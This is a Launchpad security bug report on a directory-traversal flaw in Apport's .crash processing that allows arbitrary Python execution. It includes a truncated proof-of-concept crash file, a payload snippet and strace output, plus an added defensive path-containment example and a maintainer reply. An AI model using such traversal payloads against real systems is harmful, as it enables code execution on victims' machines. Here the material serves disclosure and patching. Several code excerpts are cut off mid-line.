Code execution through path traversal in .crash files processing
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| Apport | Fix Released | High | Unassigned | |
| apport (Ubuntu) | Fix Released | High | Brian Murray | |
| Trusty | Fix Released | High | Unassigned | |
| Xenial | Fix Released | High | Unassigned | |
| Yakkety | Fix Released | High | Unassigned | |
| Zesty | Fix Released | High | Unassigned | |
| Artful | Fix Released | High | Brian Murray | |
Bug Description
The function add_hooks_info in apport/report.py is vulnerable to a directory traversal when processing the ExecutablePath key of a malicious .crash file:
```python
opt_path = None
if self.get(
elif package:
    # check package contents
    try:
        for f in apport.
    except ValueError:
        # uninstalled package
if opt_path:
    while len(opt_path) >= len(_opt_dir):
```
This can be used to execute an arbitrary python script from an attacker controlled path when a crash file is opened:
```
fwilhelm@box:~$ cat poc.crash
ProblemType: Bug
ExecutablePath: /opt/..
Package: f
fwilhelm@box:~$ cat /tmp/poc/
import os
os.system(
fwilhelm@bpx:~$ strace -eprocess -f /usr/share/
[pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-
[pid 62617] execve(
```
The subdirectory requirement makes this a bit tricky to exploit remotely, but depending on the environment a malicious USB drive, a shared NFS share or a crash file inside an archive could be used.
Please credit Felix Wilhelm from the Google Security Team in all releases, patches and advisories related to these issues.
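An added defender-side example (not apport's code and not the reporter's) of the check this report is about: it parses a constructed .crash sample, shows that a bare prefix test accepts the traversal value, and replaces it with a canonicalise-then-containment check before any hook directory is derived from ExecutablePath. `OPT_ROOT`, `safe_opt_path` and `candidate_hook_dirs` are hypothetical names, and the `share/apport/package-hooks` walk-up is an assumed layout, not apport's actual lookup.

```python
import os

_OPT_DIR = "/opt"
OPT_ROOT = os.path.realpath(_OPT_DIR)  # canonical form of the trusted root

# Constructed sample modelled on the report's poc.crash, not the original file.
SAMPLE_CRASH = """\
ProblemType: Bug
ExecutablePath: /opt/../tmp/poc
Package: f
"""


def parse_crash(text):
    """Parse the top-level 'Key: value' lines of a .crash file into a dict."""
    report = {}
    for line in text.splitlines():
        if line and not line[0].isspace() and ":" in line:
            key, _, value = line.partition(":")
            report[key.strip()] = value.strip()
    return report


def naive_is_under_opt(path):
    """A plain prefix test: '/opt/../tmp/poc' passes it, which is the bug."""
    return path.startswith(_OPT_DIR)


def safe_opt_path(path):
    """Return the canonical path if it really lives under /opt, else None.
    realpath() collapses '..' and follows symlinks; commonpath() then
    confirms the resolved result never left the trusted root."""
    if not path.startswith(_OPT_DIR + os.sep):
        return None
    real = os.path.realpath(path)
    if os.path.commonpath([real, OPT_ROOT]) != OPT_ROOT:
        return None
    return real


def candidate_hook_dirs(executable_path):
    """Hypothetical hook lookup: walk from the executable up towards /opt,
    collecting share/apport/package-hooks candidates that all stay inside /opt."""
    path = safe_opt_path(executable_path)
    dirs = []
    while path and len(path) > len(OPT_ROOT):
        dirs.append(os.path.join(path, "share", "apport", "package-hooks"))
        path = os.path.dirname(path)
    return dirs
```

A traversal value yields no candidate directories at all, so nothing outside /opt is ever consulted for a hook script.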
CVE References
| Changed in | Field | Change |
|---|---|---|
| apport (Ubuntu Trusty) | status | New → Confirmed |
| apport (Ubuntu Xenial) | status | New → Confirmed |
| apport (Ubuntu Yakkety) | status | New → Confirmed |
| apport (Ubuntu Zesty) | status | New → Confirmed |
| apport (Ubuntu Artful) | status | New → Confirmed |
| apport (Ubuntu Trusty) | importance | Undecided → High |
| apport (Ubuntu Xenial) | importance | Undecided → High |
| apport (Ubuntu Yakkety) | importance | Undecided → High |
| apport (Ubuntu Zesty) | importance | Undecided → High |
| apport (Ubuntu Artful) | importance | Undecided → High |
| apport | status | Confirmed → Fix Released |
| apport | importance | Undecided → High |
| apport | information type | Private Security → Public Security |
| apport | tags | added: patch |
| apport (Ubuntu Artful) | status | Confirmed → In Progress |
| apport (Ubuntu Artful) | assignee | nobody → Brian Murray (brian-murray) |
Hi Felix - thanks for the report! I don't immediately see how an attacker could have control of what Apport uses for ExecutablePath in the crash file. Is there more to your attack than hand crafting a .crash file and running apport-gtk on it or am I missing something here?
Subscribing bdmurray for Ubuntu apport expertise.